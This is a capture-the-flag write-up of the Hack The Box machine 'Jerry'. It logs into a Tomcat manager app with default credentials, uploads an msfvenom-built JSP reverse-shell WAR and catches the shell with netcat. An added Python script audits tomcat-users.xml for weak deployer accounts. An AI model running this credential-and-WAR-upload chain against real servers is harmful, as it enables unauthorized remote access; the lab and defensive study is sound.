Jerry has retired and this is my write-up about it…
Jerry was one of the easiest boxes on HTB. It was a beginner box.
It’s a Windows box and its IP is 10.10.10.95.
Starting with nmap to scan for TCP ports and services:
nmap -sV -sT 10.10.10.95
We can see that port 8080 is open and running HTTP, and the server is Apache Tomcat.
Visiting it in the browser, we get the default Tomcat configuration page.
There’s a manager app, so let’s try to access it.
It asks for authentication, and common passwords like those mentioned below didn’t work:
Closing the login prompt causes an error, because we are not authorized to view the manager page.
But looking at the error page:
It shows these credentials:
This seems to be part of the documentation, and those credentials are default credentials.
Will they work? Yup!
Now we are logged in to the manager app, and we can get a shell from here.
We are on an Apache Tomcat server, and Apache Tomcat uses WAR files.
To get a reverse shell we will use msfvenom to create the payload:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.xx.xx LPORT=4449 -f war > backdoor.war
Then we will upload our payload to the server.
Then we will listen on the port with netcat:
nc -lvnp 4449
Now we have a reverse shell as admin, so there’s no need for privilege escalation.
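From the defender's side, the root cause here is a manager account left with documentation credentials and a role that allows WAR deployment. The following is an added example, not part of the original write-up: it audits a tomcat-users.xml for such accounts. The sample XML, the account names and the weak-password list are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Roles that allow deploying WAR files through the manager application.
DEPLOY_ROLES = {"manager-gui", "manager-script"}
# Constructed sample denylist of weak / documentation-style passwords (assumption).
WEAK_PASSWORDS = {"tomcat", "admin", "password", "s3cret", "changeit", "manager"}

# Constructed sample configuration, not taken from the target box.
SAMPLE_USERS_XML = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <user username="deployer" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="monitor" password="s3cret" roles="manager-status"/>
  <user username="ops" password="q7!Vz2#LmR9^tYw4" roles="manager-script"/>
  <user username="ci" password="ci" roles="admin-gui, manager-script"/>
</tomcat-users>
"""

def local(tag):
    """Strip the XML namespace so files with and without xmlns both parse."""
    return tag.rsplit("}", 1)[-1]

def audit_tomcat_users(xml_text):
    """Return (username, reason) for each account that can deploy WARs with a weak password."""
    findings = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        if local(elem.tag) != "user":
            continue
        name = elem.get("username", "")
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        if not roles & DEPLOY_ROLES:
            continue  # cannot upload applications, out of scope for this check
        if not password:
            findings.append((name, "empty password"))
        elif password.lower() in WEAK_PASSWORDS:
            findings.append((name, "password on weak/default list"))
        elif password.lower() == name.lower():
            findings.append((name, "password equals username"))
    return findings

if __name__ == "__main__":
    for user, reason in audit_tomcat_users(SAMPLE_USERS_XML):
        print(f"[!] {user}: {reason}")
```

Accounts that only hold manager-status are skipped on purpose, since that role cannot deploy applications.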
Another way to do this is to use TomcatWarDeployer, a tool written by mgeeky, to automate the process of getting a shell.
That’s it. Feedback is appreciated!
Don’t forget to read the previous write-ups, tweet about the write-up if you liked it, and follow @Ahm3d_H3sham on Twitter for awesome resources.
Thanks for reading.